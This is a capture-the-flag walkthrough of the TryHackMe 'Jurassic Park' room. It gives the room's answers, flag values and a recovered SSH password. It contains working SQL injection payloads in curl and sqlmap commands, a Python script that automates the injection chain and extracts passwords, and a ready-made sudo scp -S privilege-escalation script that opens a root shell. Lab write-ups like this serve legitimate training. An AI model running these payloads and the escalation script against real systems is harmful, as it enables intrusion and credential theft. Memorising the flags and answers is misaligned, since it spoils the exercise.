thm-jurassicpark-nl

NOTICE: (SPOILER!!) If you would like to solve it by yourself, don’t read further.

Today let’s play  Tryhackme’s Jurassicpark at

This medium-hard task will require you to enumerate the web application, get credentials to the server and find 5 flags hidden around the file system. Oh, Dennis Nedry has helped us to secure the app too…

You're also going to want to turn up your device's volume (Firefox is recommended). So, deploy the VM and get hacking.

Please connect to our network before deploying the machine.


#1 What is the SQL database called which is serving the shop information?

#2 How many columns does the table have?
5

#3 What's the system version?
ubuntu 16.04
┌─[user@parrot-virtual]─[~]
└──╼ $curl 'http://10.10.28.121/item.php?id=5%20union%20select%201,version(),3,4,5'

#4 What is dennis' password?
ih8dinos
┌─[user@parrot-virtual]─[~]
└──╼ $curl 'http://10.10.28.121/item.php?id=5%20union%20select%201,password,3,4,5%20FROM%20users'

#5 Locate and get the first flag contents.
b89f2d69c56b9981ac92dd267f

#6 What's the contents of the second flag?
96ccd6b429be8c9a4b501c7a0b117b0a

#7 What's the contents of the third flag?
b4973bbc9053807856ec815db25fb3f1

#8 There is no fourth flag.

#9 What's the contents of the fifth flag?
2a7074e491fcacc7eeba97808dc5e2ec

We start with an nmap version scan using the default script set (-sV -sC) against the top ports. It shows SSH open on port 22 and an Apache web server on port 80.

Let's navigate to the online shop. Here we can purchase a package; I select the bronze package. The first thing to notice is the address bar: the package page is selected by a query parameter, ?id=2.

From the tags on this room we know it involves SQL injection (SQLi). I cycle through ?id= values from 0 to 5 to see which pages come up:

?id=0 — No results found

?id=1 — Gold package

?id=2 — Bronze package

?id=3 — Basic package

?id=4 — No results found

?id=5 — Development package (Interesting)

The Development package page mentions a user named Dennis. It also carries a note that certain characters cannot be used, and the single quote (') is the first character you reach for in SQLi.

Let's try to break the query with ?id=5' or 1=1

The request is rejected: the single quote is blocked, which is why my initial attempts with sqlmap did not work. So let's try another character that is not on the blocklist, the asterisk (*).

Appending ?id=5* produces a database error in the response. An unexpected character reaching the database unsanitised means the id parameter is concatenated straight into the query, so the page is vulnerable to SQL injection. Because id is used as a number, the payloads that follow need no quotes at all, so the filter does not get in the way.

First let's find out how many columns the query returns, so that we can append a UNION SELECT.

To do this we use ORDER BY with a column index and raise it until the database complains: ?id=5 order by 1, then order by 2, and so on. ORDER BY n works while n is no larger than the number of selected columns; the first n that errors is one past the count.

The query returns 5 columns. Knowing this we can use UNION to pull other data out of the database, but first we need to see which of the five columns are actually rendered on the page. That is what a marker union is for: ?id=5 union all select 1,2,3,4,5

Using distinct markers such as 01,02,03,04,05 I can see which positions show up. Column 1 does not appear on the page at all, and column 3 is rendered as the price with a $ prefix, so columns 2, 4 and 5 are the convenient ones for pulling data out of the database.

Next we need the database version and the database name (we already know the column count). Both come from built-in functions, version() and database(), placed in one of the reflected columns.

the database name is and the version is 

To pull the table names from the current database we can use information_schema through the reflected column:

?id=1 union select 1,2,3,group_concat(table_name),5 from information_schema.tables where table_schema = database()

We can see that we have two tables and 

Let's pull the columns of the table 'users'. To do this we can use the following (the table name has to be a string; the single quote is blocked but the double quote is not, so MySQL's double-quoted string literal does the job):

?id=1 union select 1,2,3,group_concat(column_name),5 from information_schema.columns where table_schema = database() and table_name = "users"

In the table ‘users’ we have the following columns – and 

Normally I would extend this further and pull all the usernames and passwords from the database; however, remember the ?id=5 page.

The word 'username' is blocked too; the password column is not. We can extract it with:

?id=5 union select 1,2,3,password,5 from users

Although we cannot retrieve the username, we can assume from the Development package page that it is dennis, and the password is ih8dinos. Hopefully these are also the SSH credentials for port 22.
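As an added example (not code from the write-up, and not the room's real item.php), here is the whole chain above run end to end: the ORDER BY column count, the marker UNION and the password pull, against a constructed stand-in of the vulnerable page. The stand-in is SQLite-backed, so the MySQL-only pieces (version(), database(), information_schema) are not reproduced; everything else, the id concatenated into the query, the blocklist for the single quote and the word username, and the table and column names, is constructed to mirror what the page describes.

```python
"""
Offline re-creation of the item.php injection chain (constructed example).
The "web app" is a stand-in backed by SQLite; the real room runs MySQL.
"""
import re
import sqlite3
from typing import Callable, List

Fetch = Callable[[str], str]  # maps the raw ?id= value to the response body


# ---- constructed target ----------------------------------------------------
def build_db() -> sqlite3.Connection:
    """Constructed sample data; only the column layout matters."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE items(id INTEGER, name TEXT, price INTEGER,
                           blurb TEXT, sold INTEGER);
        INSERT INTO items VALUES
          (1, 'Gold',        100, 'Everything included',        12),
          (2, 'Bronze',       10, 'Starter package',             7),
          (3, 'Basic',         5, 'Bare minimum',               20),
          (5, 'Development',   3, 'Internal - contact dennis',   5);
        CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
        INSERT INTO users VALUES (1, 'dennis', 'ih8dinos');
        """
    )
    return conn


BLOCKLIST = ("'", "username")  # the "you cannot use certain characters" note


def item_php(conn: sqlite3.Connection, item_id: str) -> str:
    """Stand-in for item.php: the id parameter is concatenated into the SQL."""
    if any(bad in item_id.lower() for bad in BLOCKLIST):
        return "Blocked"
    try:  # no placeholder, no cast to int: this is the injection point
        rows = conn.execute(
            "SELECT id, name, price, blurb, sold FROM items WHERE id=" + item_id
        ).fetchall()
    except sqlite3.Error as exc:
        return f"SQL error: {exc}"
    if not rows:
        return "No results found"
    # Columns 2-5 are rendered, column 1 (id) is not, like the real page.
    return "".join(
        f"<h1>{name} Package</h1><h3>Price: ${price}</h3>"
        f"<h4>{blurb}</h4><b>{sold}</b> sold in the last hour."
        for _id, name, price, blurb, sold in rows
    )


# ---- attacker side ----------------------------------------------------------
def find_column_count(fetch: Fetch, base_id: str = "5", limit: int = 20) -> int:
    """ORDER BY n leaves the page unchanged while n <= column count; the first
    n that changes the response (an error page) is one past the count."""
    baseline = fetch(base_id)
    count = 0
    for n in range(1, limit + 1):
        if fetch(f"{base_id} order by {n}") != baseline:
            break
        count = n
    return count


def find_reflected_columns(fetch: Fetch, ncols: int, base_id: str = "5") -> List[int]:
    """UNION SELECT distinct numeric markers (no quotes needed) and see which
    of them come back in the HTML."""
    markers = [9000 + i for i in range(1, ncols + 1)]
    body = fetch(f"{base_id} union select {','.join(map(str, markers))}")
    return [i for i, m in enumerate(markers, start=1) if str(m) in body]


def dump_via_column4(fetch: Fetch, ncols: int, expr: str, table: str,
                     base_id: str = "5") -> List[str]:
    """Put `expr` into column 4 (rendered inside <h4>, as on the real page) and
    read back every value that was not already on the baseline page."""
    cols = ["1"] * ncols
    cols[3] = expr
    seen = set(re.findall(r"<h4>(.*?)</h4>", fetch(base_id)))
    body = fetch(f"{base_id} union select {','.join(cols)} from {table}")
    return [v for v in re.findall(r"<h4>(.*?)</h4>", body) if v not in seen]


def run_chain(fetch: Fetch) -> dict:
    """The full sequence from the write-up, against whatever `fetch` targets."""
    ncols = find_column_count(fetch)
    return {
        "columns": ncols,
        "reflected": find_reflected_columns(fetch, ncols),
        "passwords": dump_via_column4(fetch, ncols, "password", "users"),
        # the word 'username' trips the filter; 'password' does not
        "username_blocked": fetch("5 union select 1,2,3,username,5 from users") == "Blocked",
    }


if __name__ == "__main__":
    conn = build_db()
    print(run_chain(lambda payload: item_php(conn, payload)))
```

Note that none of the attacker payloads contain a quote: numeric markers and bare identifiers are enough when the injection point is numeric, which is exactly why the character filter never fires. Against the real box you would replace the lambda with a function that URL-encodes the payload and fetches item.php over HTTP.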

┌─[user@parrot-virtual]─[~]
└──╼ $curl 'http://10.10.28.121/item.php?id=5%20union%20select%201,version(),3,4,5'
<link rel="icon" type="image/png" href="assets/favicon.png"/>

<!DOCTYPE html>
<html lang="en">
<head>
<title>Buy, Buy, Buy</title>--snip--


<h1>5.7.25-0ubuntu0.16.04.2 Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $3</h3></br>
<div class="alert alert-primary" role="alert"><b>5</b> of these packages have been sold in the last hour.</div></br>
<h4>4</h4>
</br><h4>Order yours quick by calling us!</h4>

</div>
</body>
</html>
┌─[user@parrot-virtual]─[~]

Or we simply let sqlmap do all the work (-u takes the URL; -r would expect a saved request file):

┌─[user@parrot-virtual]─[~]
└──╼ $sqlmap -u 'http://10.10.114.167/item.php?id=1' --batch --dump --threads 10

-> dennis / ih8dinos

Logging in over SSH as dennis works. Exploring dennis's home directory we find flag1.txt.

We can also read .bash_history, and it contains the third flag. The history also shows scp being run repeatedly with sudo (scp copies files between hosts over SSH) and reveals that flag5 is in the /root directory.

Let's check whether dennis has any sudo privileges with sudo -l. He is allowed to run scp as root, which explains the .bash_history.

Moving back to /home to see what other users exist, there is one called ubuntu, so we cd into that directory. A hidden file stands out: .viminfo, owned by root. vim writes its recent-file list, marks and command history to .viminfo, so it often leaks the paths a root user has been editing. Although we cannot read it as dennis, the sudo rule for scp lets us copy it as root to our local machine.

Kali should already have the OpenSSH server installed, and we need it listening to receive the file. As I do not use ssh that much, I start the server through its socket unit:

# systemctl start ssh.socket

If you want a good guide to setting up the SSH server, see How to Enable and Start SSH on Kali Linux (LMG Security, www.lmgsecurity.com).

Back to downloading the interesting .viminfo file to our local machine with sudo scp. Once it has arrived we cat it, and it gives us some very interesting information: the location of flagTwo, which is in /boot/grub/fonts. Catting that file gives us the second flag.

We know there is no flag4 and we know that flag5 is in the /root directory, so again we use the sudo rights on scp to transfer flag5 to our local machine.

There is another option instead of transferring files to the local machine one at a time: turn the sudo rule into a root shell. The scp binary itself is not vulnerable, and it being owned by root is irrelevant; what matters is that sudo runs it as root and that scp's -S option lets the caller choose the program scp executes as its SSH transport. Whatever program we name there runs as root.

The go-to resource for binaries that can be abused this way is GTFOBins (gtfobins.github.io), a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions.

A quick search on GTFOBins for scp with sudo rights gives the recipe: write a tiny script that starts a shell, make it executable and pass it to sudo scp -S. Running it as dennis drops us into a root shell.

How awesome is that: a few lines of code and full root access.
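The GTFOBins scp recipe, as an added example (not code from the write-up or from GTFOBins' own page), wrapped in Python so the pieces can be checked before they are handed to sudo. The helper body and the argv follow GTFOBins' scp/sudo entry; the function names and the dry-run switch are this example's own. It assumes a sudo rule that allows scp as root, as on this box.

```python
"""
sudo scp -S privilege escalation (GTFOBins recipe), with a dry-run guard.
scp -S <program> names the program scp runs as its ssh transport; under
`sudo scp` that program is executed as root.
"""
import os
import stat
import subprocess
import tempfile
from typing import List, Optional

# scp connects the transport's stdin/stdout to its protocol pipes but leaves
# stderr on the terminal, so the shell is wired to fd 2 on both ends.
HELPER_BODY = "#!/bin/sh\nsh 0<&2 1>&2\n"


def write_helper(directory: Optional[str] = None) -> str:
    """Drop the helper script to a unique temp file and make it executable."""
    fd, path = tempfile.mkstemp(prefix="transport-", dir=directory)
    with os.fdopen(fd, "w") as fh:
        fh.write(HELPER_BODY)
    os.chmod(path, stat.S_IRWXU)  # 0700: only our own user needs it
    return path


def is_ready(path: str) -> bool:
    """Sanity check before handing the path to sudo: right content, executable."""
    st = os.stat(path)
    with open(path) as fh:
        body = fh.read()
    return body == HELPER_BODY and bool(st.st_mode & stat.S_IXUSR)


def escalation_argv(helper: str) -> List[str]:
    """`sudo scp -S helper x y:`: the remote-looking 'y:' makes scp start the
    transport for host 'y'; the local file 'x' is never actually read."""
    return ["sudo", "scp", "-S", helper, "x", "y:"]


def escalate(dry_run: bool = True) -> int:
    """Build the helper and either show the command (dry run) or run it."""
    helper = write_helper()
    if not is_ready(helper):
        raise RuntimeError("helper script not ready")
    argv = escalation_argv(helper)
    if dry_run:
        print("would run:", " ".join(argv))
        return 0
    return subprocess.call(argv)  # interactive root shell until exit


if __name__ == "__main__":
    escalate(dry_run=True)
```

Run with dry_run=False as dennis on the box to get the shell; the test below only exercises the file and argv construction, never sudo.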

Author : Puckiestyle
